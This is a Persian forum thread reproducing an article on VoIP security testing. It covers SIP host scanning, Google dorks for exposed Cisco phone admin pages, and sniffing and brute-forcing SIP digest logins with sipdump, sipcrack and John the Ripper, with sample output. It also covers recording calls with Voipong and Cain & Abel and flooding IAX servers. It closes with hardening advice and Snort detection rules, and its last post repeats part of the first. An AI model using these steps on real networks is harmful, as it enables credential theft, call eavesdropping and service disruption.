رفتن به مطلب
اطلاعیه مهم: پایان فعالیت انجمن پس از 15 سال ×
اطلاعیه مهم: پایان فعالیت انجمن پس از 15 سال

آزمون‌ها و راه‌حل‌هاي ايمن‌سـازي فنـاوري VoIP

Fahim

توسط Fahim،
در هک وامنیت شبکه

ارسال های توصیه شده

Fahim    9563

Fahim
ارسال شده در

براي شركت‌هاي بزرگ، استفاده از فناوري VoIP به‌منظور برقراري ارتباط بين شعبه‌ها و كارمندان راه دور، شيوه‌اي ساده و مناسب است؛ بسياري از كاربران به منظور حذف شركت‌هاي تلفن قديمي و كاهش هزينه‌هاي مكالمات از فناوري VoIP استفاده مي‌كنند. اجازه دهيد كار خود را با تشريح ابزارهاي مورد استفاده براي آزمايش يك ساختار VoIP آغاز كنيم. فناوري موسوم به VoIP (سرنامVoice over IP) همان فناوري‌اي است كه امكان برقراري مكالمات تلفني را از طريق ترافيك IP فراهم مي‌كند و هر روز مورد استفاده تعداد فزاينده‌اي از شركت‌ها و اشخاص قرار مي‌گيرد. بهره گيري از فناوري VoIP روش ساده‌اي براي برقراري ارتباط بين شعبه‌هاي مختلف و همچنين برقراري ارتباط با كارمندان راه دور شركت‌ها محسوب مي‌شود. بسياري از كاربران به‌منظور حذف شركت‌هاي تلفن قديمي و پرداخت هزينه كمتر براي مكالمات به اين فناوري روي مي‌آورند. بسياري از عرضه‌كنندگان خدمات اينترنتي در سراسر دنيا به‌منظور كاهش هزينه‌هاي مكالمه تلفني از فناوري‌هاي خلاقانه‌اي بهره‌ مي‌برند.

اين رويكرد جديد در برقراري ارتباطات تلفني، زمينه تجاري نويني را براي آن دسته از شركت‌ها كه با تكيه بر فناوري IP و خدمات مربوط فعاليت مي‌كنند، ايجاد كرده است. البته از طرفي موجب بروز مشكلات متعددي نيز شده‌است كه پيش از اين در سيستم‌هاي تلفن سنتي، وجود نداشت. تلفن‌هاي آنالوگ قديمي‌اي كه نواقص بسيار داشتند، با تجهيزات هوشمند جايگزين شده‌اند. اغلب اين تجهيزات به يك سيستم‌عامل و ساير امكاناتي از اين دست مجهز هستند. اين تصوير كلي را مي‌توان به‌منظور درك بهتر تمام زيرساخت تلفن، از كابل‌ها گرفته تا فناوري PBX مورد استفاده قرار داد. ارتباطات تلفني با استفاده از پروتكل‌هاي فراهم‌سازي ارتباطات (مانند SIP، H323 و IAX) و پروتكل‌هاي انتقال داده‌ها (مانند RTP و IAX) برقرار مي‌شوند. اين پروتكل‌ها همواره در ارتباطات بي‌نقص و سيستم‌هايي با سامانه مجوزدهي ضعيف استفاده شده‌اند. فناوري جديد در مقايسه با فناوري قديمي ارتباطات تلفني، فاكتورهاي متعددي را معرفي كرده است؛ در اين مقاله رويكردهاي مختلف مورد استفاده براي كاوش در امنيت سيستم VoIP را مورد بررسي قرار مي‌دهيم.

به‌طور خلاصه، اين مقاله مواردي همچون اسكن زيرساخت، كنترل رابط‌هاي مديريت، رسوخ به ارتباطات و سامانه اعتبارسنجي و ممانعت از ارائه خدمات (حملات DoS) را مورد بحث قرار مي‌دهد. براي اين كار، برخي از مشكلات موجود در سيستم را شناسايي كرده و ميزان خطر حاصل از آن‌ها را به درستي تحليل مي‌كنيم. ابزارها

براي تحليل يك ساختار VoIP ابزارهاي متعددي وجود دارد. در پايان مقاله آدرس اينترنتي مجموعه‌اي از ابزارهاي تجاري و اپن‌سورس موجود براي تحليل سيستم آمده است. در ادامه برخي از ابزارهاي مذكور را براي شناسايي موارد زير به كار مي‌گيريم: خدمات فعال

مديريت PBX و ترمينال

مجوزدهي

ضبط و بررسي تماس‌هاي تلفني

حمله‌هاي DoS

 

اسكن خدمات فعال

با استفاده از ابزار NMAP امكان اسكن ميزبان‌هاي راه‌دور و كشف موارد مربوط به VoIP فراهم مي‌شود. با استفاده از گزينه sU– مي‌توان فهرست سرويس‌هاي فعال را كه روي پورت‌هاي UDP ثبت شده‌اند و با خدمات VoIP مانند SIP و IAX v2 مرتبط هستند، شناسايي كرد.

ابزار SMAP

ابزار SMAP به دليل تمركز بر پروتكل SIP، بسيار مفيد است. اين ابزار محصول ادغام كاركردهاي دو ابزار NMAP و SIPSAK است. ابزار SMAP به واسطه ارسال چندين درخواست SIP به واحدهاي مختلف موجود در شبكه و انطباق نتايج آن با داده‌هاي موجود در يك بانك اطلاعاتي، قادر است مدل و سيستم‌عامل تجهيزات سخت‌افزاري را تشخيص دهد. براي استفاده از اين ابزار بايد آن را در قالب آرشيو tar.gz از اينترنت دريافت كرده و پس از بازگشايي آرشيو در يك پوشه، فايل Makefile را اجرا كنيد تا منابع موجود در آن، كامپايل شوند. چنان‌كه در فهرست1 مشاهده مي‌کنيد، استفاده از ابزار SMAP بسيار ساده است.

سازنده اين پروژه معتقد است، ابزار SMAP در شبكه‌هاي محلي نتايج بسيار دقيقي را به دست مي‌دهد، اما اگر اين ابزار براي تشخيص اطلاعات تجهيزات مستقر در بيرون يك NAT يا ديوار آتش به‌كار گرفته شود، در صحت نتايج حاصل ترديد وجود دارد.

رابط‌هاي مديريت

آيا مي‌توانيد وضعيت اينترنت را بدون وجود موتورهاي جست‌وجو يا پيوندهاي تودرتو كه از يك صفحه وب آغاز شده و به طور بازگشتي ادامه مي‌يابند، تصور كنيد؟ با استفاده از اين شيوه اطلاعات ميليون‌ها وب‌سايت در زمان به نسبت كوتاهي گردآوري مي‌شود. اين ايده ممكن است براي بعضي موجب برآشفتگي شده و براي برخي ديگر جالب و حتي براي برخي ديگر از افراد بسيار كارآمد باشد. به عبارت ديگر، اگر گوگل اغلب زمان خود را صرف گردآوري اطلاعات از اينترنت مي‌كند، چرا ما براي دسترسي به همان اطلاعات خود را به زحمت بياندازيم در حالي كه سايرين قبلاً اين كار را انجام داده‌اند؟اما اين موضوع چه ربطي به امنيت VoIP دارد؟ آيا گوشي‌هاي VoIP مورد استفاده شما داراي رابط وب است؟ آيا سرور VoIP شما رابط وب دارد؟ آيا دسترسي به رابط سرور VoIP يا گوشي‌هاي شما از طريق وب امكان‌پذير است؟ ممكن است تصور كنيد چه كسي امكان دسترسي به يك رابط مديريتي را از طريق اينترنت فراهم مي‌كند؟ حق داريد چنين فكري بكنيد، اما در هر حال بهتر است تجهيزات خود را بررسي كنيد.

تكنيك Footprinting رويكرد جامعي است كه براي گردآوري اطلاعات اوليه در سيستم‌هايي كه داراي شكاف‌هاي امنيتي شناخته‌شده يا پيكربندي نامناسب (چيزي شبيه به user=admin و password=admin) هستند، مورد استفاده قرار مي‌گيرد. اين رويكرد به واسطه جست‌وجو در بانك‌هاي اطلاعاتي گوگل با استفاده از دنباله‌هاي كاراكتري است. به اين ترتيب، آن دسته از رابط‌هاي مديريتي كه توسط اسپايدرها در اينترنت كشف شده‌اند، شناسايي مي‌شوند. توسعه و رشد اين شيوه وام‌دار صدها نوع دستگاه و تجهيزات است كه از رابط مديريت تحت وب استفاده مي‌كنند. امروزه يافتن اين دستگاه‌ها و تجهيزات در سراسر دنيا به امري ساده تبديل شده است. در ادامه چند نمونه عملي را بررسي مي‌کنيم:

دنباله كاراكتري

inurl:"NetworkConfiguration"Cisco

چنان‌چه دنباله كاراكتري فوق را در گوگل وارد كنيد، بانك‌هاي اطلاعاتي اين موتور جست‌وجو را براي يافتن تلفن‌هاي VoIP محصول شركت سيسکو يا رابط‌ مديريت آن‌ها، جست‌وجو كرده‌ايد.شگفت‌انگيز است. با اين كار تعداد زيادي از تجهيزات را مي‌يابد كه به‌درستي نشانه‌گذاري شده‌اند. در عمل اين نوع جست‌وجو به خوبي شناخته شده و در حقيقت تعداد كمي از تجهيزات موردنظر از اين طريق قابل دسترسي هستند.

رابط سيسکو دستورالعمل‌هاي كمي دارد. مي‌توان تصور كرد در صورتي كه اين رابط امكان برقراري تماس را براي افراد ثالث فراهم كند، چه اتفاقي رخ مي‌دهد. به احتمال نمي‌توان تماس‌هاي برقرار شده در سيستم را ضبط و بررسي كرد، اما درون سايتي كه رابط مديريت متعلق به آن است، زنگ تمام تلفن‌ها ب دون هيچ علتي به‌صدا درمي‌آيد. فرض كنيد اگر رابط يك سيستم جمع‌آوري اطلاعات (PCAP) داشته باشد، چه اتفاقي رخ مي‌دهد؟ در اين شرايط مي‌توان ترافيك اطلاعات مربوط به تماس‌هاي تلفني را در ميان مسير مورد دسترسي قرار داده و پس از دريافت محلي اطلاعات، آن را بر اساس الگوهايي تحليل كرد. اما يافتن چنين رابط‌هايي غيرممكن است؛ زيرا اين رابط‌ها وجود خارجي ندارند.

 

e.g.0114930398330"snow''

در صورت تمايل مي‌توانيد اطلاعات ذخيره شده در حافظه رابط راه‌دور را آزمايش كنيد. نكته مهم اين است كه در اين صفحات يك دنباله كاراكتري مشخص براي جست‌وجو در گوگل بيابيد. براي طراحان رابط مديريت تحت وب، شناخت يك پيكربندي استاندارد براي مديريت اسپايدرها بسيار مفيد است: يك طراح براي تعيين صفحاتي كه بايد نشانه‌گذاري شوند و صفحاتي كه نبايد مورد دسترسي قرار گيرند، فايلي موسوم به robots.txt را درون دايركتوري مرجع قرار مي‌دهد. براي صفحات مرتبط با رابط‌هايي كه مايل به نشانه‌گذاري آن‌ها نيستيد، بايد دو سطر زير را درون فايل Robots.text وارد كنيد:

User-Agent: *

Disallow: /

اعتبارسنجي

اعتبارسنجي براي بسياري از كلاينت‌ها و تجهيزات SIP بر اساس شِماي Digest/MD57 و HTTP انجام مي‌شود. اين نوع اعتبارسنجي نقاط ضعف متعددي دارد. به‌عنوان مثال، مي‌توان به حمله‌هاي مبتني بر ابزارهاي ساده كشف رمز عبور اشاره كرد. براي تحليل ترافيك شبكه در ارتباطات UDP از ابزار Whiteshark استفاده مي‌كنيم. با استفاده از اين ابزار توانمند مي‌توان نموداري از بسته‌هاي اطلاعاتي مبادله شده در طول تماس تلفني ترسيم كرد. براي اين كار كافي است از منوي Statistics گزينه VoIP Calls و سپس گزينه Graph را انتخاب كنيد (شكل1).براي كشف نحوه اعتبارسنجي مي‌توان از يك ***** خاص براي پروتكل SIP استفاده كرده و درخواست‌هاي ثبت را به‌دست آورد (شكل 2).

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

شكل 1

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

شكل 2

به‌منظور تسهيل فرآيند *****سازي مي‌توان از ابزار SIPcrack استفاده كرد. اين ابزار كوچك كه به زبان C نوشته شده، فقط براي تحليل اعتبارسنجي SIP طراحي شده است. ابزار SIPcrack يك برنامه نفوذ به پروتكل SIP است و از دو برنامه مجزا شامل Sidump و Sipcrack تشكيل شده است. برنامه Sidump با استفاده از رونوشت تهيه شده توسط Tcpdump تلاش‌هاي شبكه را براي اعتبارسنجي كشف مي‌كند. برنامه Sipcrack با تهاجم به سيستم، کلمه‌هاي عبور را كشف مي‌كند. مثالي از نحوه به‌كارگيري اين ابزار در فهرست2 آمده است. ترتيب كار به اين صورت است كه ابتدا تمام بسته‌هاي udp در رابط eth ضبط و سپس درون فايل net-capture.txt ذخيره مي‌شوند.با استفاده از برنامه Sipdump مي‌توان تلاش‌هاي انجام شده براي ورود به سيستم را ***** كرده و آن‌ها را درون فايل sip-logins.dump ذخيره كرد (فهرست3). smap [ Options ]

$ ./smap 192.168.100.0/24

smap 0.4.0-cvs

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

Host 192.168.100.1:5060: (ICMP OK) SIP enabled

Host 192.168.100.2:5060: (ICMP OK) SIP timeout

Host 192.168.100.3:5060: (ICMP timeout) SIP enabled

...

Host 192.168.100.254:5060: (ICMP OK) SIP enabled

Asterisk PBX (unknown version)

256 hosts scanned, 10 ICMP reachable, 3 SIP enabled

$ ./smap -o 192.168.100.1

smap 0.4.0-cvs

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

Host 192.168.100.1:5060: (ICMP OK) SIP enabled

AVM FRITZ!Box Fon Series firmware: 14.03.(89|90)

1 hosts scanned, 1 ICMP reachable, 51SIP enabled

فهرست 1

dimebag SIPcrack-0.1 # tcpdump -s 0 -w net-capture.txt udp -i eth0

tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

237 packets captured

474 packets received by filter

0 packets dropped by kernel

فهرست 2

dimebag SIPcrack-0.1 # ./sipdump -d sip-logins.dump -f net-capture.txt

SIPdump 0.1 ( MaJoMu |

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.
)

------------------------------------------------

* Using tcpdump data file 'net-capture.txt' for sniffing

* Starting to sniff with filter 'tcp or udp'

* Adding 192.168.123.92:50195 192.168.123.99:50451 to monitor list...id 0

* New traffic on monitored connection 0 (192.168.123.92 -> 192.168.123.99)

* Found challenge response (192.168.123.92:50195 192.168.123.99:50451)

* Wrote sniffed login 192.168.123.92 -> 192.168.123.99 (User: '201') to dump file

* Exiting, sniffed 1 logins

فهرست 3

براي فراهم كردن امكان استفاده از فهرست واژگان موجود در ساير نرم‌افزارها (براي مثال John the Riper) به ترتيب زير يك فايل fifo pip ايجاد كنيد:

dimebag SIPcrack-0.1 # mkfifo fifosipcrack

براي شروع ‌كار نرم‌افزار John the Riper در يك ترمينال ديگر و ارسال رونوشت‌ها به Sipcrack (فهرست4) عبارات زير را اجرا كنيد:

dimebag SIPcrack-0.1 # john --

incremental=alnum --stdout=8 >

fifosipcrack

در مورد اين مثال و پيامدهاي انجام آن دوباره فكر كنيد. در يك زيرساخت VoIP ممكن است به سهولت اعتبارنامه خود را از دست بدهيد. يكي از راه‌حل‌هاي رفع چنين مشكلي مي‌تواند استفاده از كانال‌هاي كدشده همراه VPN يا SIP روي TLS(سرنام Transport Layer Security) باشد. روي پروتكل IAX v2 نيز با استفاده از سيستم اعتبارسنجي مبتني بر MD5 مي‌توان تحليل مشابهي را انجام داد. (sipcrack in action)

dimebag SIPcrack-0.1 # ./sipcrack -w fifosipcrack -d sip-logins.dump

SIPcrack 0.1 ( MaJoMu |

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.
)

--------------------------------------------------

* Reading and parsing dump file...

* Found Accounts:

Num Server Client User Algorithm Hash / Password

1 192.168.123.99 192.168.123.92 201 MD5 dfc9979f98f0c546 c08dc3073dda1cc1

* Select which entry to crack (1 – 1): 1

* Generating static MD5 hash...e71899168871bb8929ff6c25aab955b2

* Starting bruteforce against user ‘201’ (MD5 Hash: ‘dfc9979f98f0c546c08dc3073dda1cc1’)

* Loaded wordlist: ‘fifosipcrack’

* Tried 25 passwords in 0 seconds

* Found password: ‘1234’

* Updating ‘sip-logins.dump’...done

فهرست 4

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

شكل 3 - نمايي از برنامه Cain & Abel

لینک به دیدگاه

Fahim    9563

Fahim
  • مالک
ارسال شده در

ضبط و بررسي تماس‌ها

با بررسي نمودار ترسيم شده توسط ابزار Wireshark متوجه مي‌شويد كه ارتباطات مؤثر بر اساس پروتكل RTP برقرار مي‌شوند. براي شناسايي مشكلات احتمالي در فرآيند ضبط و بررسي از ابزار Voipong استفاده مي‌كنيم. ابزار Voipong يك ردياب شبكه است كه امكان ضبط و بررسي تماس‌هاي VoIP را روي چندين پروتكل (مانند SIP، H323 و پروتكل Skinni Client محصول شركت سيسکو) فراهم مي‌كند. به علاوه با استفاده از اين ابزار مي‌توان تماس‌هاي واضح را روي RTP يافته و پس از كدگشايي آن‌ها را در يك فايل wav. ذخيره كرد. ابزار Voipong را مي‌توان از وب‌سايت توسعه‌دهنده آن در قالب يك برنامه قابل اجرا و بدون نياز به نصب روي هاردديسك دريافت كرد. با استفاده از ماجول‌هاي DSOM (سرنام Dynamic Shared Object Modules) مي‌توان ساختار كدگشايي ابزار مذكور را توسعه داد، اما در نسخه 2 رمزگشاهاي G711– law و G711 a-law به‌طور پيش‌فرض پشتيباني شده‌اند. اين رمزگشاها به دليل كيفيت بالاي فايل‌هاي صوتي خروجي، متداول‌ترين نمونه‌هاي موجود در ترمينال‌هاي LAN هستند. برنامه رسوخ‌گر براي عملكرد صحيح نيازمند كتابخانه‌هاي libcap و براي ساخت فايل wav. نيازمند كتابخانه sox‌ است. پس از كامپايل و نصب نرم‌افزار، بايد آن را با استفاده از فايل voipong.conf پيكربندي كنيد(فهرست5). (file di configurazione voipong.conf)

[GENERAL]

logdir = /var/log

logfile = voipong.log

cdrfile = /var/log/voipcdr.log

networksfile = /usr/local/etc/voipong/voipongnets

pidfile = /var/run/voipong.pid

mgmt_ipcpath = /tmp/voipongmgmt.sock

soxpath = /usr/bin/sox

soxmixpath = /usr/bin/soxmix

modpath = /usr/local/etc/voipong/modules

mixwaves = 0

defalg = lfp

rtp_idle_time = 10

device = eth0

promisc = 1

snaplen = 1500

readtmt = 500

outdir = /var/log/voipong/

[FILTERS]

startup = “udp”

فهرست 5

به‌علاوه براي تعيين موقعيت فايل موردنظر براي رسوخ بايد به ترتيب زير از فايل voipongnest استفاده كنيد:

192.168.3.0/255.255.255.0 lfp

عبارت LFP (سرنام Least False Positive) به الگوريتم مورد استفاده براي شناسايي تماس‌هاي VoIP اشاره دارد. براي اطلاعات بيشتر مي‌توانيد به اسناد آنلاين اين نرم‌افزار مراجعه كنيد. ابزار Voipong به عنوان يك رسوخ‌گر عادي شبكه نيازمند فعال‌سازي حالت listen با استفاده از يك رابط شبكه است كه توانايي يافتن تمام ترافيك VoIP را دارد. ما براي رسيدن به اين هدف از چندين گزينه مختلف بهره مي‌گيريم:

- نصب برنامه روي سيستم گيت‌وي شبكه VoIP

- استفاده از يك رابط شبكه كه به پورت نظارت سوييچ متصل مي‌شود.

- استفاده از يك رابط شبكه مشترك با يك هاب

- تكنيك Poisoning ARP

- تكنيك Wwitch Flooding

هنگام شروع كار با Voiponing مي‌توان برنامه رسوخ‌گر را در حالت پس‌زمينه‌فعال كرده و با استفاده از كنسول Voipcti تماس‌ها را ضبط و بررسي كرد (فهرست6). (voipong in background)

dimebag voipong-2.0 # ./voipong

EnderUNIX VOIPONG Voice Over IP Sniffer starting...

Release 2.0, running on dimebag [Linux 2.6.18 i686]

© Murat Balaban

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

dimebag voipong-2.0 #

dimebag voipong-2.0 # ./voipctl

Connected to VoIPong Management Console

System:

dimebag [Linux 2.6.18 i686]

voipong> shcall

ID NODE1 PORT1 NODE2 PORT2 STIME DURATION

----- ---------------- ----- ---------------- ----- ----------------- ------------

09534 192.168.123.99 05022 192.168.123.92 16260 13/02/07 17:26:32 9 seconds

Total listed: 1

فهرست 6

همان‌طور که در فهرست6 مشاهده مي‌كنيد، با استفاده از دستور Shcall مي‌توان ارتباط بين ميزبان 192.168.123.99 روي پورت udp به شماره 5022 و ميزبان 192.168.123.92 روي پورت udp به شماره 19260 را مشاهده كرد. با استفاده از كنسول مذكور مي‌توان اطلاعات مشاهده‌شده و گزينه‌هاي مربوط به سرور را پيكربندي كرد (فهرست7). در مثال موردبحث، به‌منظور گوش كردن مکالمه‌هاي درحال ضبط و بررسي، بايد دايركتوري موجود در فايل پيكربندي را در قالب گزينه Outdir باز كرده و فايل‌هاي wav. را جمع‌آوري كنيد. voipong> help

Commands:

help : this one

quit : quit management console

uptime : Server uptime

logrotate : rotate server's logs

setdebug [level] : set debug level to [level]

setmixflag [flag] : set mix voice flag to true or false [e.g: 1 for true, 0 for false]

shutdown : shutdown server

rusage : CPU usage statistics for the server

loadnets : Reload voipongnets file

info : General server information

shcall : Show currently monitored calls

shrtcp : Show currently RTCP cache

killcall [id] : end monitoring session with [id]

فهرست 7

با استفاده از ابزار Cain & Abel روي كامپيوتري با سيستم‌عامل ويندوز امكان آرشيو كردن نتايج وجود دارد. اين كار توسط يك برنامه رسوخ‌گر انجام مي‌شود كه قابليت ضبط و بررسي تماس‌هاي كد شده توسط كدگذارهاي G711 Law ،G771 aLaw ،ADPCM، DVI4 ،LPC ،GSM610 ،Microsoft GSM ،L16 ،G729 ،Speex،iLBC،G722.1 ،G723.1 ،G726-16 ،G726-24 ،G726-32 ،G726-40 و LPC-10 را دارد. با انتخاب اين رسوخ‌گر مي‌توانيد تماس‌ها را با كدگذار مربوط ببينيد. البته اين تماس‌ها پس از كدگشايي در قالب فايل‌هاي wav. درون همان دايركتوري كه ابزار Cain & Abel نصب شده، ذخيره مي‌شوند. با استفاده از اين ابزارهاي توانمند ضبط و بررسي تماس‌هاي تلفني كه با بهره‌گيري از پروتكل‌هاي فعال در حالت Clear برقرار مي‌شوند، بسيار ساده بوده و به بهره‌گيري از تكنيك‌هاي رمزگذاري نيازي نيست. براي اجتناب از اين مشكلات بهتر است از كانال‌هاي VPN يا پروتكل SRTP ‌استفاده شود. به همين ترتيب،‌ پخش فايل‌هاي صوتي كه پروتكل IAX v2 در حالت clear از آن پشتيباني مي‌كند، قابل نفوذ است. با وجود اين، سازندگان پروتكل اخير راه‌حلي را براساس به‌كارگيري يك كانال كدشده توسط AES ارائه كرده‌اند كه هنوز به‌طور رسمي اعلام نشده است. شكل3 نمايي از برنامه Cain & Abel را نشان مي‌دهد.

dimebag ~ # cd /var/log/voipong/20070213/

 

dimebag 20070213 # ls

session-enc0-PCMU-8KHz-192.168.123.92,16260-192.168.123.99,5022.raw

session-enc0-PCMU-8KHz-192.168.123.92,19088-192.168.123.99,5026.raw

session-enc0-PCMU-8KHz-192.168.123.99,5022-192.168.123.92,16260.raw

session-enc0-PCMU-8KHz-192.168.123.99,5022-192.168.123.92,16260.wav

session-enc0-PCMU-8KHz-192.168.123.99,5026-192.168.123.92,19088.raw

session-enc0-PCMU-8KHz-192.168.123.99,5026-192.168.123.92,19088.wav

 

فهرست 8

 

حمله‌هاي DoS

يكي از چالش‌هاي پروتكل‌هاي SIP و IAX v2 حمله‌هاي Denial of Service يا ممانعت از خدمات است. با استفاده از زبان برنامه‌نويسي Perl به سادگي مي‌توان ابزارهايي را ايجاد كرد كه قابليت ارسال بسته‌هاي DoS را داشته باشند. براي انجام اين كار مي‌توان از كتابخانه‌هاي CPAN كه به‌طور خاص براي پروتكل طراحي شده‌اند، بهره‌گرفت يا برنامه‌هايي مانند SIPBomber، IAXflood و SIPsak را مورد استفاده قرار داد. برنامه IAXflood بسيار توانمند بوده و كاربردي ساده دارد. هنگام استفاده از پروتكل IAX اين برنامه مي‌تواند بسته‌هاي DoS را روي يك سرور VoIP ايجاد كند. براي كار با اين برنامه بايد مرجع موردنظر و شماره بسته را به ترتيب زير تعيين كنيد:

usage: ./iaxflood sourcename

destinationname numpackets

براي اين كار بايد امكان دسترسي مستقيم به مرجع و مقصد برنامه، بدون نياز به سيستم NAT از طريق آدرس IP شما فراهم باشد. هدف از به‌كارگيري اين بسته‌ها، كاهش كيفيت خدمات به‌گونه‌اي است كه در نهايت سرور مسدود شود.

جمع‌بندي و پيشنهاد

بر اساس نوع زيرساخت، بايد به موضوعات امنيتي مقتضي توجه كنيد. در ادامه برخي از اين موضوعات فهرست شده است:

- خطوط PSTN يا ISDN را براي بسته‌هاي صوتي حفظ كنيد.

- با استفاده از UPS يك سيستم پشتيبان نيرو و انتقال توان به شبكه اترنت به‌منظور تأمين توان ترمينال‌ها، طراحي كنيد.

- خدمات در حالت Clear يا خدمات اعتبار سنجي ضعيف حفاظت نشده را به حداقل ممكن برسانيد. تلفن‌ها و رابط‌هاي مديريت را بدون حفاظت در اينترنت باقي نگذاريد.

- براي مديريت ترمينال‌ها از كلمات عبور امن استفاده كنيد.

- با استفاده از VLAN در شبكه خصوصي خود ترافيك اطلاعات و VoIP‌ را تقسيم كنيد.

- در صورت امكان از تجهيزاتي استفاده كنيد كه از كدگذاري فايل‌هاي صوتي توسط پروتكل SRTP پشتيباني مي‌كنند.

- كيفيت خدمات را مديريت كنيد.

- با استفاده از VPN ipsec يا tls براي ترافيك VoIP از كانال‌هاي كد شده بهره بگيريد.

- استفاده از منابع شبكه را (به‌عنوان مثال با استفاده از برنامه

source IP control) محدود كنيد.

- از ديوارهاي آتش سطح برنامه (مانند SIP/IAX) استفاده كنيد.

- از سيستم‌هاي اجتناب از تداخل

(Intrusion Prevention System) استفاده كنيد. استفاده از سيستم‌هاي IPS براي مقابله از حمله‌هاي DoS روي پروتكل‌هاي VoIP ضروري است. اين سيستم‌ها در سطح برنامه‌ها فعال بوده و به همين دليل امكان تداخل آن‌ها با تجهيزات ISO/OSI سطح3 وجود ندارد. سيستم استاندارد حفاظتي IDS/IPS با عنوان Snort شناخته مي‌شود كه حالت ورودي سيستم IPS را كنترل مي‌كند.پروتكل SIP معمولاً دچار مشكلات امنيتي است. در سيستم Snort قواعد خاصي براي حفاظت از اين پروتكل در مقابل متداول‌ترين حمله‌ها وجود دارد. براي اطلاع بيشتر به فهرست9 مراجعه كنيد. اين بخش از قوانين به منظور محافظت دائمي از سيستم‌هاي آسيب‌پذير كه يك فاكتور اصلي در خدمات VoIP محسوب مي‌شود، طراحي شده است. در فهرست10 مي‌توانيد مثالي از نحوه مقابله با يك آسيب‌پذيري شناخته شده را ببينيد. اين قاعده (كه از انجمن Snort اخذ شده) از سيستم در مقابل تجاوزات مضر احتمالي حفاظت مي‌كند.

# this set are for general SIP specific flooding

drop ip any any -> $HOME_NET 5060 (msg:"BLEEDING-EDGE VOIP INVITE Message Flood"; content:"INVITE"; depth:6; threshold: type both , track by_src, count 100, seconds 60

; classtype:attempted-dos; sid:2003192; rev:1;)

drop ip any any -> $HOME_NET 5060 (msg:"BLEEDING-EDGE VOIP REGISTER Message Flood"; content:"REGISTER"; depth:8; threshold: type both , track by_src, count 100, second

s 60; classtype:attempted-dos; sid:2003193; rev:1;)

#from the rules at nextsoft.cz

#intended to catch unusual numbers of unauthorized responses from sip servers

drop ip $HOME_NET 5060 -> any any (msg:"BLEEDING-EDGE VOIP Multiple Unathorized SIP Responses"; content:"SIP/2.0 401 Unauthorized"; depth:24; threshold: type both, tra

ck by_src, count 5, seconds 360; classtype:attempted-dos; sid:2003194; rev:1;)

فهرست9

(snort rules)

#Rule submitted by rmkml

drop udp $EXTERNAL_NET any -> $HOME_NET 5060 (msg:"COMMUNITY EXPLOIT SIP UDP Softphone overflow attempt"; content:"|3B|branch|3D|"; content:"a|3D|"; pcre:"/^a\x3D[^\n]{1000,}/smi"; reference:bugtraq,16213; reference:cve,2006-0189; classtype:misc-attack; sid:100000223; rev:1;)

فهرست10

آدرس ابزارهاي مورد استفاده براي تحليل سيستم

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

لینک به دیدگاه

Fahim    9563

Fahim
  • مالک
ارسال شده در

اعتبارسنجي

اعتبارسنجي براي بسياري از كلاينت‌ها و تجهيزات SIP بر اساس شِماي Digest/MD57 و HTTP انجام مي‌شود. اين نوع اعتبارسنجي نقاط ضعف متعددي دارد. به‌عنوان مثال، مي‌توان به حمله‌هاي مبتني بر ابزارهاي ساده كشف رمز عبور اشاره كرد. براي تحليل ترافيك شبكه در ارتباطات UDP از ابزار Whiteshark استفاده مي‌كنيم. با استفاده از اين ابزار توانمند مي‌توان نموداري از بسته‌هاي اطلاعاتي مبادله شده در طول تماس تلفني ترسيم كرد. براي اين كار كافي است از منوي Statistics گزينه VoIP Calls و سپس گزينه Graph را انتخاب كنيد (شكل1).براي كشف نحوه اعتبارسنجي مي‌توان از يك ***** خاص براي پروتكل SIP استفاده كرده و درخواست‌هاي ثبت را به‌دست آورد (شكل 2).

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

شكل 1

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

شكل 2

به‌منظور تسهيل فرآيند *****سازي مي‌توان از ابزار SIPcrack استفاده كرد. اين ابزار كوچك كه به زبان C نوشته شده، فقط براي تحليل اعتبارسنجي SIP طراحي شده است. ابزار SIPcrack يك برنامه نفوذ به پروتكل SIP است و از دو برنامه مجزا شامل Sidump و Sipcrack تشكيل شده است. برنامه Sidump با استفاده از رونوشت تهيه شده توسط Tcpdump تلاش‌هاي شبكه را براي اعتبارسنجي كشف مي‌كند. برنامه Sipcrack با تهاجم به سيستم، کلمه‌هاي عبور را كشف مي‌كند. مثالي از نحوه به‌كارگيري اين ابزار در فهرست2 آمده است. ترتيب كار به اين صورت است كه ابتدا تمام بسته‌هاي udp در رابط eth ضبط و سپس درون فايل net-capture.txt ذخيره مي‌شوند.با استفاده از برنامه Sipdump مي‌توان تلاش‌هاي انجام شده براي ورود به سيستم را ***** كرده و آن‌ها را درون فايل sip-logins.dump ذخيره كرد (فهرست3).

smap [ Options ]

$ ./smap 192.168.100.0/24

smap 0.4.0-cvs

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

Host 192.168.100.1:5060: (ICMP OK) SIP enabled

Host 192.168.100.2:5060: (ICMP OK) SIP timeout

Host 192.168.100.3:5060: (ICMP timeout) SIP enabled

...

Host 192.168.100.254:5060: (ICMP OK) SIP enabled

Asterisk PBX (unknown version)

256 hosts scanned, 10 ICMP reachable, 3 SIP enabled

$ ./smap -o 192.168.100.1

smap 0.4.0-cvs

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

Host 192.168.100.1:5060: (ICMP OK) SIP enabled

AVM FRITZ!Box Fon Series firmware: 14.03.(89|90)

